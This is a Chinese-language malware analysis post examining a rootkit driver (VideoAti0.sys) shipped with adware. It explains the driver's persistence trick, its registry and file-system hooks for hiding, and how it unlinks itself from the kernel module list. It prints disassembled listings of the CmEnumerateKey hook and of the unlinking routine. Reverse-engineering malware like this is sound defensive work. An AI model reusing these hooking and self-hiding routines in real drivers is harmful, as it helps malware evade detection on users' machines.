BY mj0011
u88财富快车流氓软件RK驱动分析RK部分一共三个文件VideoAti0.sysVideoAti0.dllVideoAti0.exe驱动部分是BOOT0的,主要干了这么些事:1.建立CreateProcessNotifyRoutine,检测到userinit.exe加载后就修改注册Run项目,以启动VideoAti0.exe,VideoAtio0.exe启动后会删除自己的RUN项目,并注入VideoAti0.dll,导致启动后无法发现其启动项目2.Hook CmEnumerateKey,隐藏VedioAti0.sys的服务项,Is,gmer,rku等无法检测到通过CreatePrcoessNotifyRoutine检测到是如下进程调用CmEnumerateKey时,会恢复自己的HOOK,企图蒙混过关:Dfhs.exe,knlsc13.exe3.Hook FSD Dispatch Routine,Hook了/FileSystem/Ntfs,和/FileSystem/FastFat的IRP_MJ_CREATE和IRP_MJ_DIRECTORY_FILE,根据默认规则库会首先过滤VideoAti0.sysVideoAti0.dllVideoAti0.exe无法列出他们规则库还可以通过R3向R0添加4.从PsLoadMoudleList移除了自身,使得IS,gmer等工具无法检测到它,gmer可检测到 FSD HOOK,也检测不到是哪个module作了HOOK后来R3的规则好象很BT,系统登陆后加载任何位置的driver都会失败:D分析后的idb文件见压缩包,和读源代码没什么区别了
摘点代码
.text:000112D4 NewCMEnumerateKey proc near ; DATA XREF: ReadyHardCodeAndHook+1DBo.text:000112D4 ; NewCMEnumerateKey+14Co.text:000112D4.text:000112D4 var_24 = byte ptr -24h.text:000112D4 NewIrql = byte ptr -1.text:000112D4 arg_0 = dword ptr 8.text:000112D4 arg_4 = dword ptr 0Ch.text:000112D4 arg_8 = dword ptr 10h.text:000112D4 arg_C = dword ptr 14h.text:000112D4 arg_10 = dword ptr 18h.text:000112D4 arg_14 = dword ptr 1Ch.text:000112D4.text:000112D4 push ebp.text:000112D5 mov ebp, esp.text:000112D7 sub esp, 24h.text:000112DA push ebx.text:000112DB push esi.text:000112DC push edi.text:000112DD call ds:KeRaiseIrqlToDpcLevel.text:000112E3 mov [ebp+NewIrql], al.text:000112E6 call WP_OFF.text:000112E6.text:000112EB pushf.text:000112EC pusha.text:000112ED lea esi, unk_14390.text:000112F3 mov edi, CmEnumerateKeyAddress.text:000112F9 mov ecx, 6.text:000112FE cld.text:000112FF rep movsb.text:00011301 popa.text:00011302 popf.text:00011303 call WP_ON.text:00011303.text:00011308 mov cl, [ebp+NewIrql] ; NewIrql.text:0001130B call ds:KfLowerIrql.text:00011311 push [ebp+arg_14].text:00011314 mov ebx, [ebp+arg_C].text:00011317 mov esi, [ebp+arg_4].text:0001131A push [ebp+arg_10].text:0001131D add esi, dword_14374.text:00011323 push ebx.text:00011324 push [ebp+arg_8].text:00011327 push esi.text:00011328 push [ebp+arg_0].text:0001132B call OldcmEnumerateKey.text:00011331 test eax, eax.text:00011333 mov [ebp+arg_4], eax.text:00011336 jge short loc_11342.text:00011336.text:00011338 cmp eax, 8000001Ah.text:0001133D jmp loc_113FF.text:0001133D.text:00011342 ; ---------------------------------------------------------------------------.text:00011342.text:00011342 loc_11342: ; CODE XREF: NewCMEnumerateKey+62j.text:00011342 lea eax, [ebp+var_24].text:00011345 push eax ; char *.text:00011346 call GetCurrentCallProcess.text:00011346.text:0001134B mov edi, ds:_stricmp.text:00011351 lea eax, [ebp+var_24].text:00011354 push offset s_Fhs_exe ; "fhs.exe".text:00011359 push eax ; char *.text:0001135A call edi ; _stricmp.text:0001135C pop ecx.text:0001135D test eax, eax.text:0001135F pop ecx.text:00011360 jnz short loc_1136D.text:00011360.text:00011362 lea eax, [ebp+var_24].text:00011365 push eax.text:00011366 push offset s_ProcessnameS ; "ProcessName:%S/n".text:0001136B jmp short loc_11387.text:0001136B.text:0001136D ; ---------------------------------------------------------------------------.text:0001136D.text:0001136D loc_1136D: ; CODE XREF: NewCMEnumerateKey+8Cj.text:0001136D lea eax, [ebp+var_24].text:00011370 push offset s_Knlsc13_exe ; "knlsc13.exe".text:00011375 push eax ; char *.text:00011376 call edi ; _stricmp.text:00011378 pop ecx.text:00011379 test eax, eax.text:0001137B pop ecx.text:0001137C jnz short loc_11390.text:0001137C.text:0001137E lea eax, [ebp+var_24].text:00011381 push eax.text:00011382 push offset s_Processname_0 ; "ProcessName:%S/n".text:00011382.text:00011387.text:00011387 loc_11387: ; CODE XREF: NewCMEnumerateKey+97j.text:00011387 call DbgPrint.text:00011387.text:0001138C pop ecx.text:0001138D pop ecx.text:0001138E jmp short StopHook.text:0001138E.text:00011390 ; ---------------------------------------------------------------------------.text:00011390.text:00011390 loc_11390: ; CODE XREF: NewCMEnumerateKey+A8j.text:00011390 mov edi, dword_1439C.text:00011390.text:00011396.text:00011396 loc_11396: ; CODE XREF: NewCMEnumerateKey+EFj.text:00011396 cmp edi, offset HideReg.text:0001139C jz short StopHook.text:0001139C.text:0001139E test edi, edi.text:000113A0 jz short StopHook.text:000113A0.text:000113A2 push dword ptr [edi-8] ; wchar_t *.text:000113A5 call ds:wcslen.text:000113AB push eax ; size_t.text:000113AC lea eax, [ebx+10h].text:000113AF push eax ; wchar_t *.text:000113B0 push dword ptr [edi-8] ; wchar_t *.text:000113B3 call ds:_wcsnicmp.text:000113B9 add esp, 10h.text:000113BC test eax, eax.text:000113BE jz short loc_113C5.text:000113BE.text:000113C0 mov edi, [edi+4].text:000113C3 jmp short loc_11396.text:000113C3.text:000113C5 ; ---------------------------------------------------------------------------.text:000113C5.text:000113C5 loc_113C5: ; CODE XREF: NewCMEnumerateKey+EAj.text:000113C5 push dword ptr [edi-8].text:000113C8 push offset s_FoundHideregS ; "Found HideReg:%S/n".text:000113CD call DbgPrint.text:000113CD.text:000113D2 pop ecx.text:000113D3 inc esi.text:000113D4 pop ecx.text:000113D5 mov dword_14374, 1.text:000113DF push [ebp+arg_14].text:000113E2 push [ebp+arg_10].text:000113E5 push ebx.text:000113E6 push [ebp+arg_8].text:000113E9 push esi.text:000113EA push [ebp+arg_0].text:000113ED call OldcmEnumerateKey.text:000113F3 test eax, eax.text:000113F5 mov [ebp+arg_4], eax.text:000113F8 jge short StopHook.text:000113F8.text:000113FA cmp eax, 8000001Ah.text:000113FA.text:000113FF.text:000113FF loc_113FF: ; CODE XREF: NewCMEnumerateKey+69j.text:000113FF jnz short StopHook.text:000113FF.text:00011401 and dword_14374, 0.text:00011401.text:00011408.text:00011408 StopHook: ; CODE XREF: NewCMEnumerateKey+BAj.text:00011408 ; NewCMEnumerateKey+C8j.text:00011408 ; NewCMEnumerateKey+CCj.text:00011408 ; NewCMEnumerateKey+124j.text:00011408 ; NewCMEnumerateKey:loc_113FFj.text:00011408 call ds:KeRaiseIrqlToDpcLevel.text:0001140E mov [ebp+NewIrql], al.text:00011411 call WP_OFF.text:00011411.text:00011416 pusha.text:00011417 mov edi, CmEnumerateKeyAddress.text:0001141D mov al, 68h.text:0001141F stosb.text:00011420 lea eax, NewCMEnumerateKey.text:00011426 stosd.text:00011427 mov al, 0C3h.text:00011429 stosb.text:0001142A popa.text:0001142B call WP_ON.text:0001142B.text:00011430 mov cl, [ebp+NewIrql] ; NewIrql.text:00011433 call ds:KfLowerIrql.text:00011439 mov eax, [ebp+arg_4].text:0001143C pop edi.text:0001143D pop esi.text:0001143E pop ebx.text:0001143F leave.text:00011440 retn 18h.text:00011440.text:00011440 NewCMEnumerateKey endp
.text:00011794 RemoveMyselfFormPsLoadModuleLIst proc near ; CODE XREF: start:loc_1049Fp .text:00011794 .text:00011794 var_208 = word ptr -208h .text:00011794 .text:00011794 push ebp .text:00011795 mov ebp, esp .text:00011797 sub esp, 208h .text:0001179D and [ebp+var_208], 0 .text:000117A5 push esi .text:000117A6 push edi .text:000117A7 mov ecx, 81h .text:000117AC xor eax, eax .text:000117AE lea edi, [ebp-206h] .text:000117B4 rep stosd .text:000117B6 stosw .text:000117B8 mov eax, PsLoadedModuleList .text:000117BD mov edi, [eax] .text:000117BF mov esi, edi .text:000117BF .text:000117C1 .text:000117C1 loc_117C1: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+88j .text:000117C1 cmp dword ptr [esi+20h], 0 .text:000117C5 jz short loc_11816 .text:000117C5 .text:000117C7 push dword ptr [esi+28h] ; VirtualAddress .text:000117CA call ds:MmIsAddressValid .text:000117D0 test al, al .text:000117D2 jz short loc_11816 .text:000117D2 .text:000117D4 mov eax, [esi+28h] .text:000117D7 test eax, eax .text:000117D9 jz short loc_11816 .text:000117D9 .text:000117DB movzx ecx, word ptr [esi+24h] .text:000117DF shr ecx, 1 .text:000117E1 push ecx ; size_t .text:000117E2 push eax ; wchar_t * .text:000117E3 lea eax, [ebp+var_208] .text:000117E9 push eax ; wchar_t * .text:000117EA call ds:wcsncpy .text:000117F0 lea eax, [ebp+var_208] .text:000117F6 push eax ; wchar_t * .text:000117F7 call ds:_wcslwr .text:000117FD lea eax, [ebp+var_208] .text:00011803 push offset s_Videoati0 ; "videoati0" .text:00011808 push eax ; wchar_t * .text:00011809 call ds:wcsstr .text:0001180F add esp, 18h .text:00011812 test eax, eax .text:00011814 jnz short loc_1181E .text:00011814 .text:00011816 .text:00011816 loc_11816: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+31j .text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+3Ej .text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+45j .text:00011816 mov esi, [esi] .text:00011818 cmp esi, edi .text:0001181A jz short loc_11828 .text:0001181A .text:0001181C jmp short loc_117C1 .text:0001181C .text:0001181E ; --------------------------------------------------------------------------- .text:0001181E .text:0001181E loc_1181E: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+80j .text:0001181E mov eax, [esi] .text:00011820 mov esi, [esi+4] .text:00011823 mov [eax+4], esi .text:00011826 mov [esi], eax .text:00011826 .text:00011828 .text:00011828 loc_11828: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+86j .text:00011828 pop edi .text:00011829 pop esi .text:0001182A leave .text:0001182B retn .text:0001182B .text:0001182B RemoveMyselfFormPsLoadModuleLIst endp
